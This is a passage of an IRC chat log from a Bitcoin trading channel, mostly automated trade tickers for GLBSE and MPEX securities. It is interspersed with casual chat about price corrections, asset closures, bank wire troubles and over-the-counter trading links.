= 18.1141 BTC [-] Sep 27 17:15:32 [MPEX] [S.MPOE] 52692 @ 0.00035985 = 18.9612 BTC [-] Sep 27 17:15:34 [MPEX] [S.MPOE] 50600 @ 0.00035942 = 18.1867 BTC [-] Sep 27 17:15:35 [MPEX] [S.MPOE] 10500 @ 0.00035925 = 3.7721 BTC [-] Sep 27 17:15:36 [MPEX] [S.MPOE] 49500 @ 0.00035881 = 17.7611 BTC [-] Sep 27 17:15:37 [MPEX] [S.MPOE] 4900 @ 0.00035841 = 1.7562 BTC [-] Sep 27 17:15:38 [MPEX] [S.MPOE] 55796 @ 0.00035826 = 19.9895 BTC [-] Sep 27 17:15:39 [MPEX] [S.MPOE] 2300 @ 0.00035805 = 0.8235 BTC [-] Sep 27 17:15:40 [MPEX] [S.MPOE] 47000 @ 0.00035778 = 16.8157 BTC [-] Sep 27 17:15:41 [MPEX] [S.MPOE] 4900 @ 0.00035759 = 1.7522 BTC [-] Sep 27 17:15:42 [MPEX] [S.MPOE] 30200 @ 0.00035753 = 10.7974 BTC [-] Sep 27 17:15:43 [MPEX] [S.MPOE] 11277 @ 0.00035741 = 4.0305 BTC [-] Sep 27 17:16:48 pretty much, they are shares in mpex Sep 27 17:17:23 and after a rise from less than .0001 to .00042, this is a correction, not a crash Sep 27 17:19:13 well, sorta, in that rise from .0001, teh btc/usd rate went from 2 to 12 Sep 27 17:19:44 so even at .00035, it's quite a gain Sep 27 17:19:48 [GLBSE] [NYAN.A] 10 @ 0.9995 = 9.995 BTC [+] Sep 27 17:19:55 (imho) Sep 27 17:20:20 well it did lose 0,3%... Sep 27 17:21:33 jurov you around ? Sep 27 17:21:40 [GLBSE] [BIF.1YR.LOAN] 10 @ 0.86 = 8.6 BTC [+] Sep 27 17:22:53 [GLBSE] [BMF] 3 @ 0.50995 = 1.5299 BTC [-] Sep 27 17:24:55 [GLBSE] [DMC] 1 @ 0.1 BTC [+] Sep 27 17:26:45 [GLBSE] [PUREMINING] 1 @ 0.103695 BTC [-] Sep 27 17:31:51 [GLBSE] [FPGAMINING] 5 @ 0.48 = 2.4 BTC [+] Sep 27 17:31:52 [GLBSE] [FPGAMINING] 1 @ 0.49157 BTC [+] Sep 27 17:31:54 [GLBSE] [FPGAMINING] 1 @ 0.49177 BTC [+] Sep 27 17:32:09 [GLBSE] [NYAN.C] 2 @ 0.08102 = 0.162 BTC [-] Sep 27 17:32:27 [GLBSE] [FPGAMINING] 1 @ 0.25000002 BTC [-] Sep 27 17:32:28 [GLBSE] [FPGAMINING] 2 @ 0.25000001 = 0.5 BTC [-] Sep 27 17:32:30 [GLBSE] [FPGAMINING] 3 @ 0.25 = 0.75 BTC [-] Sep 27 17:32:31 [GLBSE] [FPGAMINING] 2 @ 0.24 = 0.48 BTC [-] Sep 27 17:33:57 [GLBSE] [FPGAMINING] 3 @ 0.49177 = 1.4753 BTC [+] Sep 27 17:35:20 [GLBSE] [DMC] 1 @ 0.1 BTC [+] Sep 27 17:35:53 [GLBSE] [HYDRO.BONDS] 1 @ 1.3959 BTC [-] Sep 27 17:38:06 [GLBSE] [ZETA-MINING] 1 @ 0.17599 BTC [-] Sep 27 17:38:06 [GLBSE] [ZETA-MINING] 2 @ 0.178 = 0.356 BTC [+] Sep 27 17:38:19 yes, mircea? Sep 27 17:40:44 yeeeeehaw Sep 27 17:40:46 [MPEX] [F.GIGA.ETF] 6300 @ 0.00044037 = 2.7743 BTC [+] Sep 27 17:40:48 [10:24:29] whoa holy shit futurefund div Sep 27 17:40:50 usagi: hrm? Sep 27 17:54:04 [GLBSE] [PUREMINING] 39 @ 0.100205 = 3.908 BTC [-] Sep 27 17:56:20 [GLBSE] [PUREMINING] 27 @ 0.100105 = 2.7028 BTC [-] Sep 27 17:58:44 [GLBSE] [OBSI.HRPT] 26 @ 0.04302009 = 1.1185 BTC [+] Sep 27 17:58:46 [GLBSE] [OBSI.HRPT] 7 @ 0.04302008 = 0.3011 BTC [-] Sep 27 17:58:47 [GLBSE] [OBSI.HRPT] 17 @ 0.04302005 = 0.7313 BTC [-] Sep 27 18:05:49 [MPEX] [F.GIGA.ETF] 400 @ 0.00044037 = 0.1761 BTC [+] Sep 27 18:07:29 [GLBSE] [OBSI.HRPT] 24 @ 0.04302007 = 1.0325 BTC [+] Sep 27 18:07:31 [GLBSE] [OBSI.HRPT] 9 @ 0.04302007 = 0.3872 BTC [+] Sep 27 18:09:04 [GLBSE] [NYAN.B] 1 @ 0.997 BTC [+] Sep 27 18:31:03 [MPEX] [S.MPOE] 36500 @ 0.00035826 = 13.0765 BTC [+] Sep 27 18:47:31 [GLBSE] [ASICMINER] 1 @ 0.11379999 BTC [-] Sep 27 18:47:33 [GLBSE] [ASICMINER] 5 @ 0.1138 = 0.569 BTC [+] Sep 27 18:47:33 [GLBSE] [ASICMINER] 24 @ 0.114 = 2.736 BTC [+] Sep 27 18:47:42 [GLBSE] [DMC] 1 @ 0.055 BTC [-] Sep 27 18:50:09 [GLBSE] [MU] 20 @ 0.1899 = 3.798 BTC [-] Sep 27 18:52:55 [GLBSE] [GREEN] 1 @ 0.29899999 BTC [+] Sep 27 18:52:57 [GLBSE] [GREEN] 4 @ 0.299 = 1.196 BTC [+] Sep 27 18:53:00 [GLBSE] [ASICMINER] 11 @ 0.114 = 1.254 BTC [+] Sep 27 18:53:30 [GLBSE] [ASICMINER] 15 @ 0.1143 = 1.7145 BTC [+] Sep 27 18:54:38 [GLBSE] [OBSI.HRPT] 7 @ 0.04999993 = 0.35 BTC [+] Sep 27 18:54:40 [GLBSE] [OBSI.HRPT] 1 @ 0.04999994 BTC [+] Sep 27 18:54:41 [GLBSE] [OBSI.HRPT] 2 @ 0.05 = 0.1 BTC [+] Sep 27 18:56:08 [MPEX] [S.MPOE] 37623 @ 0.00035741 = 13.4468 BTC [-] Sep 27 18:56:09 [MPEX] [S.MPOE] 15600 @ 0.00035715 = 5.5715 BTC [-] Sep 27 18:56:10 [MPEX] [S.MPOE] 12477 @ 0.00035714 = 4.456 BTC [-] Sep 27 18:57:37 [GLBSE] [ASICMINER] 1 @ 0.11439999 BTC [+] Sep 27 18:57:39 [GLBSE] [ASICMINER] 17 @ 0.1144 = 1.9448 BTC [+] Sep 27 18:57:40 [GLBSE] [BIF.1YR.LOAN] 19 @ 0.86 = 16.34 BTC [+] Sep 27 19:00:08 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.74999999 BTC [+] Sep 27 19:00:10 [GLBSE] [BIF.5-10.MININGBOND] 5 @ 0.75 = 3.75 BTC [+] Sep 27 19:00:11 [GLBSE] [BIF.5-10.MININGBOND] 19 @ 0.8 = 15.2 BTC [+] Sep 27 19:01:01 [GLBSE] [FDBF] 1 @ 0.14499999 BTC [+] Sep 27 19:01:03 [GLBSE] [FDBF] 10 @ 0.145 = 1.45 BTC [+] Sep 27 19:01:38 [GLBSE] [BTCASS_BOND_A] 1 @ 0.14599999 BTC [+] Sep 27 19:01:40 [GLBSE] [BTCASS_BOND_A] 2 @ 0.146 = 0.292 BTC [+] Sep 27 19:01:41 [GLBSE] [BTCASS_BOND_A] 3 @ 0.1487 = 0.4461 BTC [+] Sep 27 19:01:42 [GLBSE] [BTCASS_BOND_A] 13 @ 0.149 = 1.937 BTC [+] Sep 27 19:03:28 [GLBSE] [OBSI.HRPT] 23 @ 0.05 = 1.15 BTC [+] Sep 27 19:03:29 [GLBSE] [OBSI.HRPT] 28 @ 0.05799999 = 1.624 BTC [+] Sep 27 19:03:31 [GLBSE] [OBSI.HRPT] 25 @ 0.058 = 1.45 BTC [+] Sep 27 19:05:47 [GLBSE] [YABMC] 1 @ 0.07799999 BTC [-] Sep 27 19:08:33 [GLBSE] [OBSI.HRPT] 1 @ 0.05818298 BTC [+] Sep 27 19:08:34 [GLBSE] [OBSI.HRPT] 1 @ 0.05899999 BTC [+] Sep 27 19:10:31 [GLBSE] [OBSI.HRPT] 37 @ 0.05899999 = 2.183 BTC [+] Sep 27 19:10:35 [GLBSE] [OBSI.HRPT] 25 @ 0.059 = 1.475 BTC [+] Sep 27 19:10:36 [GLBSE] [OBSI.HRPT] 1 @ 0.06 BTC [+] Sep 27 19:10:37 [GLBSE] [OBSI.HRPT] 12 @ 0.0608144 = 0.7298 BTC [+] Sep 27 19:10:57 [GLBSE] [FDBF] 29 @ 0.148 = 4.292 BTC [+] Sep 27 19:12:01 [MPEX] [O.BTCUSD.C090T] 326 @ 0.26790229 = 87.3361 BTC [+] Sep 27 19:13:01 [GLBSE] [OBSI.HRPT] 25 @ 0.06081439 = 1.5204 BTC [-] Sep 27 19:14:28 [GLBSE] [PUREMINING] 4 @ 0.103695 = 0.4148 BTC [+] Sep 27 19:14:36 [MPEX] [O.BTCUSD.C140T] 7 @ 0.03266244 = 0.2286 BTC [-] Sep 27 19:14:38 [MPEX] [O.BTCUSD.C140T] 13 @ 0.00053574 = 0.007 BTC [-] Sep 27 19:15:13 [GLBSE] [BFLS.RIG] 1 @ 0.54999999 BTC [+] Sep 27 19:15:40 [GLBSE] [JLP-BMD] 1 @ 0.08995 BTC [-] Sep 27 19:16:39 [GLBSE] [ADMINSORTED] 9 @ 1.2 = 10.8 BTC [+] Sep 27 19:16:40 [GLBSE] [ADMINSORTED] 2 @ 1.5 = 3 BTC [+] Sep 27 19:19:46 [GLBSE] [OBSI.HRPT] 2 @ 0.058 = 0.116 BTC [-] Sep 27 19:20:03 [GLBSE] [BIF.1YR.LOAN] 24 @ 0.86 = 20.64 BTC [+] Sep 27 19:21:16 [GLBSE] [GREEN] 2 @ 0.3 = 0.6 BTC [+] Sep 27 19:24:16 [GLBSE] [ASICMINER] 1 @ 0.11439999 BTC [-] Sep 27 19:24:18 [GLBSE] [ASICMINER] 1 @ 0.1144 BTC [+] Sep 27 19:24:19 [GLBSE] [ASICMINER] 18 @ 0.11441 = 2.0594 BTC [+] Sep 27 19:26:58 [GLBSE] [FDBF] 10 @ 0.149 = 1.49 BTC [+] Sep 27 19:27:00 [GLBSE] [FDBF] 75 @ 0.149 = 11.175 BTC [+] Sep 27 19:31:25 [GLBSE] [BIF.1YR.LOAN] 5 @ 0.86 = 4.3 BTC [+] Sep 27 19:34:05 oh great now a power outage, decryption restarted. fml. Sep 27 19:34:23 [GLBSE] [OBSI.HRPT] 8 @ 0.06062941 = 0.485 BTC [+] Sep 27 19:34:25 [GLBSE] [OBSI.HRPT] 12 @ 0.06099997 = 0.732 BTC [+] Sep 27 19:34:48 ahaha kakobrekla Sep 27 19:34:55 start a comic! Sep 27 19:35:59 i just hope this didnt cause some extra data corruption Sep 27 19:36:06 or let it be minimal. Sep 27 19:37:28 [GLBSE] [ASICMINER] 1 @ 0.11441999 BTC [+] Sep 27 19:39:29 [GLBSE] [ASICMINER] 11 @ 0.11442 = 1.2586 BTC [+] Sep 27 19:39:56 [MPEX] [F.GIGA.ETF] 133 @ 0.00044037 = 0.0586 BTC [+] Sep 27 19:39:57 [MPEX] [F.GIGA.ETF] 2815 @ 0.00044037 = 1.2396 BTC [+] Sep 27 19:44:53 DMC was under investigation. Diablo was absolved of any wrongdoing in a GLBSE investigation Sep 27 19:45:04 o hey, Diablo-D3 did you get a little certificate or anything ? Sep 27 19:46:14 Diablo-D3, certified loudmouth Sep 27 19:48:27 You would run out of loudmouth certificates as soon as you start issuing them Sep 27 19:49:05 You'll run out of paper to print them, and of trees to make the paper... Sep 27 19:49:23 obviously they'd be digital certificates Sep 27 19:49:26 and you can't run out of digits. Sep 27 19:49:35 Oh, go on then Sep 27 19:49:38 xD Sep 27 19:50:05 tho poor kakobrekla seems to have run out of digits Sep 27 19:50:08 mircea_popescu: I work for the yakuza, you insensitive clod Sep 27 19:50:25 I only have one digit left, which is why I'm so slow at typing Sep 27 19:50:26 copumpkin i was wondering if anyone will have the sense to make that connection :D Sep 27 19:50:27 :( Sep 27 19:50:50 you're too fast for this crowd, pumpky Sep 27 19:50:50 :) Sep 27 19:51:31 my girlfriend tells me that too Sep 27 19:51:42 not sure she means it as a compliment though :( Sep 27 19:52:04 That can't be good Sep 27 19:52:29 Mostly if the landscape is crowded Sep 27 19:53:03 oh, I'm irreplaceable Sep 27 19:53:20 how many talking inverted pumpkins do you know? Sep 27 19:54:38 [GLBSE] [OBSI.HRPT] 20 @ 0.06099996 = 1.22 BTC [-] Sep 27 19:54:39 [GLBSE] [OBSI.HRPT] 30 @ 0.06099997 = 1.83 BTC [+] Sep 27 19:54:44 Can I count the ones in horror movies? Sep 27 19:54:48 [12:45:06] o hey, Diablo-D3 did you get a little certificate or anything ? Sep 27 19:54:50 nope :< Sep 27 19:54:55 should have gotten a tshirt Sep 27 19:54:56 nope Sep 27 19:55:06 "survived the great nefario storm of 2012 and all I got was this lousy tshirt" Sep 27 19:55:30 [GLBSE] [ASICMINER] 1 @ 0.11441999 BTC [-] Sep 27 19:55:31 [GLBSE] [ASICMINER] 7 @ 0.11442 = 0.8009 BTC [+] Sep 27 19:55:32 copumpkin how do you know it's not all the other ones that are inverted ? Sep 27 19:55:32 [GLBSE] [ASICMINER] 37 @ 0.1144998 = 4.2365 BTC [+] Sep 27 19:55:53 I hope this won't turn into a horror movie, either... Sep 27 19:56:02 same way I know that it isn't everyone else who just has an abnormally short penis Sep 27 19:57:38 Hey, it's happening. Gribble just metamorphosed into imsaguy2 Sep 27 19:58:03 :D Sep 27 19:58:22 I'm scared Sep 27 19:58:27 xD Sep 27 19:58:34 [GLBSE] [M.ETF] 4 @ 0.12 = 0.48 BTC [+] Sep 27 19:58:44 MITM! Sep 27 20:00:22 [GLBSE] [ASICMINER] 1 @ 0.11000001 BTC [-] Sep 27 20:00:23 [GLBSE] [ASICMINER] 3 @ 0.11 = 0.33 BTC [-] Sep 27 20:05:00 [MPEX] [F.GIGA.ETF] 700 @ 0.00044036 = 0.3083 BTC [-] Sep 27 20:05:28 [GLBSE] [ASICMINER] 3 @ 0.11 = 0.33 BTC [-] Sep 27 20:06:31 [GLBSE] [GOLD] 10 @ 0.00999997 = 0.1 BTC [-] Sep 27 20:12:52 [GLBSE] [KRAKEN] 1 @ 0.00879999 BTC [-] Sep 27 20:13:36 [GLBSE] [FPGAMINING] 1 @ 0.31337001 BTC [-] Sep 27 20:13:38 [GLBSE] [FPGAMINING] 10 @ 0.31337 = 3.1337 BTC [-] Sep 27 20:14:16 [GLBSE] [KRAKEN] 7 @ 0.0088 = 0.0616 BTC [+] Sep 27 20:16:55 [GLBSE] [GSDPT] 50 @ 0.0034 = 0.17 BTC [+] Sep 27 20:17:05 [GLBSE] [HYDRO.BONDS] 2 @ 1.3979 = 2.7958 BTC [+] Sep 27 20:17:36 Obsi any comment re https://bitcointalk.org/index.php?topic=113460.0 ? Sep 27 20:18:34 mircea_popescu: All my closed assets have closed at excellent prices out of my own pocket. Sep 27 20:18:50 [GLBSE] [ZETA-MINING] 4 @ 0.1779 = 0.7116 BTC [-] Sep 27 20:19:01 so you bought all back ? Sep 27 20:19:18 final divs on ABMO & FUTUREFUND according to contracts Sep 27 20:19:24 i see. Sep 27 20:19:29 [GLBSE] [GSDPT] 20 @ 0.0034 = 0.068 BTC [+] Sep 27 20:20:04 omg tech hates me today. Sep 27 20:22:38 [GLBSE] [BFLS.RIG] 2 @ 0.55 = 1.1 BTC [+] Sep 27 20:29:54 [GLBSE] [NYAN] 2 @ 0.79 = 1.58 BTC [+] Sep 27 20:29:56 [GLBSE] [NYAN] 5 @ 0.798 = 3.99 BTC [+] Sep 27 20:29:57 [GLBSE] [NYAN] 3 @ 0.798 = 2.394 BTC [+] Sep 27 20:30:10 [MPEX] [S.MPOE] 4880 @ 0.00035826 = 1.7483 BTC [+] Sep 27 20:37:26 [GLBSE] [NYAN.A] 5 @ 0.9995 = 4.9975 BTC [+] Sep 27 20:43:09 [GLBSE] [JLP-BMD] 20 @ 0.09 = 1.8 BTC [+] Sep 27 20:45:16 [GLBSE] [MU] 46 @ 0.1899 = 8.7354 BTC [-] Sep 27 20:45:18 [GLBSE] [MU] 30 @ 0.19 = 5.7 BTC [+] Sep 27 20:51:14 [GLBSE] [BTCWEB] 30 @ 0.08 = 2.4 BTC [+] Sep 27 20:51:16 [GLBSE] [PUREMINING] 1 @ 0.1002 BTC [-] Sep 27 20:51:18 [GLBSE] [PUREMINING] 16 @ 0.1001 = 1.6016 BTC [-] Sep 27 20:55:16 [MPEX] [S.BVPS] 100 @ 0.00343602 = 0.3436 BTC [+] Sep 27 20:55:45 [MPEX] [S.MPOE] 682 @ 0.00035826 = 0.2443 BTC [+] Sep 27 21:03:00 [GLBSE] [BTCWEB] 16 @ 0.08 = 1.28 BTC [+] Sep 27 21:06:15 [GLBSE] [ASICMINER] 1 @ 0.11444999 BTC [+] Sep 27 21:12:24 [GLBSE] [NYAN.A] 7 @ 0.9995 = 6.9965 BTC [+] Sep 27 21:12:26 [GLBSE] [NYAN.A] 68 @ 1 = 68 BTC [+] Sep 27 21:20:55 [MPEX] [S.MPOE] 26452 @ 0.00035913 = 9.4997 BTC [+] Sep 27 21:22:52 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.86 = 1.72 BTC [+] Sep 27 21:26:08 [GLBSE] [BAKEWELL] 9 @ 0.1499999 = 1.35 BTC [-] Sep 27 21:26:12 [GLBSE] [BAKEWELL] 9 @ 0.15 = 1.35 BTC [+] Sep 27 21:27:52 [GLBSE] [FDBF] 13 @ 0.149253 = 1.9403 BTC [+] Sep 27 21:28:59 [GLBSE] [GSDPT] 550 @ 0.0034 = 1.87 BTC [+] Sep 27 21:30:09 [GLBSE] [DMC] 10 @ 0.056 = 0.56 BTC [+] Sep 27 21:30:53 [MPEX] [S.DICE] 16 @ 0.0034 = 0.0544 BTC [+] Sep 27 21:32:23 [GLBSE] [NASTY] 1 @ 0.37899999 BTC [+] Sep 27 21:32:24 [GLBSE] [NASTY] 49 @ 0.379 = 18.571 BTC [+] Sep 27 21:32:55 [GLBSE] [TEEK.USD] 10 @ 0.0777 = 0.777 BTC [+] Sep 27 21:35:42 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.86 = 1.72 BTC [+] Sep 27 21:35:46 [GLBSE] [ABM] 1 @ 0.44999999 BTC [+] Sep 27 21:35:48 [GLBSE] [ABM] 9 @ 0.45 = 4.05 BTC [+] Sep 27 21:36:55 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.86 BTC [+] Sep 27 21:43:59 [GLBSE] [OBSI.HRPT] 20 @ 0.06099996 = 1.22 BTC [-] Sep 27 21:44:00 [GLBSE] [OBSI.HRPT] 1 @ 0.06099997 BTC [+] Sep 27 21:44:01 [GLBSE] [OBSI.HRPT] 4 @ 0.06099997 = 0.244 BTC [+] Sep 27 21:44:17 [GLBSE] [ASICMINER] 1 @ 0.11443999 BTC [-] Sep 27 21:44:18 [GLBSE] [ASICMINER] 199 @ 0.11444 = 22.7736 BTC [+] Sep 27 21:45:53 [GLBSE] [ASICMINER] 2 @ 0.11444 = 0.2289 BTC [+] Sep 27 21:47:04 [GLBSE] [NYAN.C] 1 @ 0.19999999 BTC [+] Sep 27 21:47:06 [GLBSE] [NYAN.C] 6 @ 0.2 = 1.2 BTC [+] Sep 27 21:47:07 [GLBSE] [NYAN.C] 1 @ 0.23795 BTC [+] Sep 27 21:47:08 [GLBSE] [NYAN.C] 1 @ 0.238 BTC [+] Sep 27 21:47:09 [GLBSE] [NYAN.C] 39 @ 0.24 = 9.36 BTC [+] Sep 27 21:47:10 [GLBSE] [NYAN.C] 2 @ 0.2472 = 0.4944 BTC [+] Sep 27 21:47:11 [GLBSE] [NYAN.C] 1 @ 0.255 BTC [+] Sep 27 21:47:12 [GLBSE] [NYAN.C] 9 @ 0.3187 = 2.8683 BTC [+] Sep 27 21:47:13 [GLBSE] [NYAN.C] 2 @ 0.35979 = 0.7196 BTC [+] Sep 27 21:47:15 [GLBSE] [NYAN.C] 2 @ 0.35979 = 0.7196 BTC [+] Sep 27 21:47:16 [GLBSE] [NYAN.C] 8 @ 0.359999 = 2.88 BTC [+] Sep 27 21:47:27 [GLBSE] [BTC-BOND] 1 @ 0.00979999 BTC [+] Sep 27 21:47:29 [GLBSE] [BTC-BOND] 1 @ 0.0098 BTC [+] Sep 27 21:49:18 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 27 21:53:26 [GLBSE] [ASICMINER] 1 @ 0.11443999 BTC [-] Sep 27 21:54:45 [GLBSE] [GIGAMINING] 2 @ 0.5799 = 1.1598 BTC [+] Sep 27 21:56:02 [MPEX] [S.BVPS] 150 @ 0.00343602 = 0.5154 BTC [+] Sep 27 21:56:03 [MPEX] [S.MPOE] 10048 @ 0.00035913 = 3.6085 BTC [+] Sep 27 21:56:04 [MPEX] [S.MPOE] 3309 @ 0.00036181 = 1.1972 BTC [+] Sep 27 21:56:08 [GLBSE] [PUREMINING] 2 @ 0.103695 = 0.2074 BTC [+] Sep 27 21:59:13 [MPEX] [S.DICE] 294 @ 0.0034 = 0.9996 BTC [+] Sep 27 22:00:41 [MPEX] [O.BTCUSD.P140N] 2 @ 0.33797459 = 0.6759 BTC [-] Sep 27 22:02:47 anyone got a NAS suggestion Sep 27 22:04:01 nas ? Sep 27 22:05:34 network attached storage Sep 27 22:07:32 a Sep 27 22:07:38 i don't use it. Sep 27 22:07:48 kakobrekla: only NAS non-suggestions Sep 27 22:08:06 im all ears Sep 27 22:09:24 mircea_popescu: on mpex min/max is the all-time min/max or current month? Sep 27 22:09:50 FabianB_ current month Sep 27 22:10:31 thx Sep 27 22:10:34 np Sep 27 22:13:20 well, I'm just saying I haven't had much luck with the 3-4 i've bought Sep 27 22:13:49 so I guess I'm listening along with you Sep 27 22:20:59 [GLBSE] [OBSI.HRPT] 8 @ 0.0460002 = 0.368 BTC [-] Sep 27 22:25:51 [MPEX] [S.MPOE] 6100 @ 0.00036286 = 2.2134 BTC [+] Sep 27 22:32:41 ;;bc,24hprc Sep 27 22:32:43 12.29 Sep 27 22:32:52 ;;calc 5000/12.29 Sep 27 22:32:52 406.834825061 Sep 27 22:38:49 I thought you were in canada Sep 27 22:38:57 oh you're in japan! Sep 27 22:39:05 i wish it would be 4.30 Sep 27 22:39:18 nihonjin desu neeeeeeeeeeee Sep 27 22:39:19 neeee Sep 27 22:39:23 neeeee Sep 27 22:39:31 darooooo ka neeeeeee Sep 27 22:39:41 )_( Sep 27 22:41:44 wtf Sep 27 22:41:58 did i get the translation right? Sep 27 22:42:53 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Sep 27 22:44:02 usagi: why do you claim Diablo sold his ABMO when you know that was not the case? Sep 27 22:44:15 [GLBSE] [ASICMINER] 1 @ 0.11433999 BTC [-] Sep 27 22:44:16 [GLBSE] [ASICMINER] 9 @ 0.11433999 = 1.0291 BTC [-] Sep 27 22:44:44 ABMO was closed out with a final dividend Sep 27 22:44:52 that in my mind is quite a difference Sep 27 22:45:12 evening :) Sep 27 22:48:35 [GLBSE] [GIGAMINING] 4 @ 0.5795 = 2.318 BTC [+] Sep 27 22:50:09 [GLBSE] [GIGAMINING] 3 @ 0.579899 = 1.7397 BTC [+] Sep 27 22:50:28 [GLBSE] [YARR] 20 @ 1 = 20 BTC [+] Sep 27 22:50:34 [GLBSE] [BDK.BND] 3 @ 0.08001 = 0.24 BTC [+] Sep 27 22:50:35 [GLBSE] [BDK.BND] 50 @ 0.08 = 4 BTC [-] Sep 27 22:50:52 [MPEX] [F.GIGA.ETF] 1199 @ 0.00044037 = 0.528 BTC [+] Sep 27 22:50:53 [MPEX] [F.GIGA.ETF] 2477 @ 0.00044037 = 1.0908 BTC [+] Sep 27 22:50:54 [MPEX] [S.MPOE] 18876 @ 0.00036475 = 6.885 BTC [+] Sep 27 22:50:55 [MPEX] [S.MPOE] 7224 @ 0.00036493 = 2.6363 BTC [+] Sep 27 22:50:57 [GLBSE] [NASTY] 1 @ 0.32000001 BTC [-] Sep 27 22:50:58 [GLBSE] [NASTY] 1 @ 0.32 BTC [-] Sep 27 22:50:59 [GLBSE] [NASTY] 4 @ 0.31 = 1.24 BTC [-] Sep 27 22:51:00 [GLBSE] [NASTY] 13 @ 0.3011 = 3.9143 BTC [-] Sep 27 22:51:01 [GLBSE] [NASTY] 25 @ 0.301 = 7.525 BTC [-] Sep 27 22:51:02 [GLBSE] [NASTY] 3 @ 0.3 = 0.9 BTC [-] Sep 27 22:51:19 [GLBSE] [COGNITIVE] 1 @ 0.48530001 BTC [-] Sep 27 22:51:19 [GLBSE] [COGNITIVE] 1 @ 0.4853 BTC [-] Sep 27 22:51:21 [GLBSE] [COGNITIVE] 8 @ 0.4851 = 3.8808 BTC [-] Sep 27 22:51:22 [GLBSE] [COGNITIVE] 16 @ 0.485 = 7.76 BTC [-] Sep 27 22:51:23 [GLBSE] [COGNITIVE] 2 @ 0.48 = 0.96 BTC [-] Sep 27 22:51:24 [GLBSE] [COGNITIVE] 1 @ 0.4799 BTC [-] Sep 27 22:51:26 [GLBSE] [COGNITIVE] 1 @ 0.45576 BTC [-] Sep 27 22:51:27 [GLBSE] [COGNITIVE] 1 @ 0.3102 BTC [-] Sep 27 22:51:28 [GLBSE] [COGNITIVE] 6 @ 0.3002 = 1.8012 BTC [-] Sep 27 22:51:29 [GLBSE] [COGNITIVE] 30 @ 0.3 = 9 BTC [-] Sep 27 22:51:53 [MPEX] [S.MPOE] 2380 @ 0.00036493 = 0.8685 BTC [+] Sep 27 23:01:15 why is people selling cognitive like crazy? Sep 27 23:01:58 prolly just general glbse sell-off that's been going on for the past few days. Sep 27 23:02:34 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 27 23:03:05 GLBSE 404 Sep 27 23:08:41 nope, no mpex pl Sep 27 23:09:02 also no moon landing. Sep 27 23:10:25 [GLBSE] [BAKEWELL] 2 @ 0.1499998 = 0.3 BTC [-] Sep 27 23:11:51 BofA appears to have suspended wire transfers to MtGox account, arumXchange has a limit of $2.15 transfer! Any ideas what is up and how to get $ into bitcoins right now? Sep 27 23:12:14 OTC baby Sep 27 23:14:59 [GLBSE] [BAKEWELL] 1 @ 0.1355 BTC [-] Sep 27 23:15:04 Bugpowder urlpls? Sep 27 23:16:14 url is my fucking wire transfer that failed Sep 27 23:16:40 !? Sep 27 23:16:41 Bugpowder: i think bitfloor is back up, can you deposite cash into wellsfargo or chasebank? Sep 27 23:16:45 they fail nao ? Sep 27 23:17:00 [MPEX] [S.MPOE] 3300 @ 0.00036286 = 1.1974 BTC [-] Sep 27 23:17:03 (they also take wires iirc)\ Sep 27 23:17:19 fuck bitfloor Sep 27 23:17:23 brb Sep 27 23:17:26 larger question is, do you want to use bitfloor Sep 27 23:18:22 lol, yeah, they have 15 of my btc held up in that incident Sep 27 23:18:58 so i want other people to use bitfloor Sep 27 23:19:31 ahahaha Sep 27 23:19:39 reckles enbitcoinment! Sep 27 23:23:39 i imagine as the banks catch on it'll be harder and harder to move through them Sep 27 23:24:01 jcpham to be honest, bitcoin has little space or scope as a consumer affair. Sep 27 23:24:19 it'll be the greatest thing for bitcoins if they become unavailable to anyone with yearly incomes under 1mn Sep 27 23:24:32 heh Sep 27 23:24:41 exclusivity works Sep 27 23:24:45 indeed. Sep 27 23:24:45 we all know this Sep 27 23:25:18 it should be a luxury for a decade or so. after that, it's established enough for the masses to join in w/o breaking anything Sep 27 23:25:48 it is a possible future Sep 27 23:26:32 trying to explain bitcoin to people without a few thousand dollars to play with at least is painful Sep 27 23:26:36 especially right now Sep 27 23:27:13 hmmm... recommendations, OTC, bitfloor or? Sep 27 23:27:43 Bugpowder an coin you can acquire off the exchanges is a good one Sep 27 23:28:29 otc is perfect if you find someone you trust Sep 27 23:28:55 ;;book btc Sep 27 23:28:55 [GLBSE] [GSDPT] 3 @ 0.0034 = 0.0102 BTC [+] Sep 27 23:28:55 Error: Too many orders to list on IRC. Visit the web order book, http://bitcoin-otc.com/vieworderbook.php?eitherthing=btc to see list of orders for this item. Sep 27 23:29:40 http://bitcoin-otc.com/vieworder.php?id=10214 Sep 27 23:29:44 Bugpowder: ^ Sep 27 23:30:07 thanks Sep 27 23:30:10 http://bitcoin-otc.com/vieworder.php?id=10216 Sep 27 23:30:12 that too Sep 27 23:30:26 i've only traded otc so far Sep 27 23:30:27 http://bitcoin-otc.com/vieworder.php?id=10268 Sep 27 23:30:35 aethero on that one Sep 27 23:30:35 a few short stints on gox during swings Sep 27 23:30:38 Bugpowder otc is usually best if you know people. Sep 27 23:30:49 but mostly with random people otc Sep 27 23:31:56 http://bitcoin-otc.com/viewratingdetail.php?nick=aethero Sep 27 23:33:13 ;;gettust smickes aethero Sep 27 23:33:20 Error: "gettust" is not a valid command. Sep 27 23:33:26 ;;gettrust smickes aethero Sep 27 23:33:27 tust lol Sep 27 23:33:27 Trust relationship from user smickes to user aethero: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=smickes&dest=aethero Sep 27 23:34:00 well, it's better than wehn i ''getthrust'd usagi Sep 27 23:34:09 haha Sep 27 23:34:11 Trust relationship from user usagi to user smickles: Level 1: 0, Level 2: 4 via 3 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=usagi&dest=smickles Sep 27 23:38:00 [GLBSE] [COGNITIVE] 1 @ 0.39999999 BTC [+] Sep 27 23:40:01 usagi: if you need PPUSD urgently, I can just lend you some. I'm not looking to buy coins, though Sep 27 23:41:28 unfortunately if I send you paypal, I think it'll incur a fee, because it's international Sep 27 23:42:16 [MPEX] [F.GIGA.ETF] 2900 @ 0.00044037 = 1.2771 BTC [+] Sep 27 23:42:56 in fact, for 11.50, I could just buy the coins Sep 27 23:43:10 not really sure what the structure is Sep 27 23:43:12 I usually don't pay any Sep 27 23:43:46 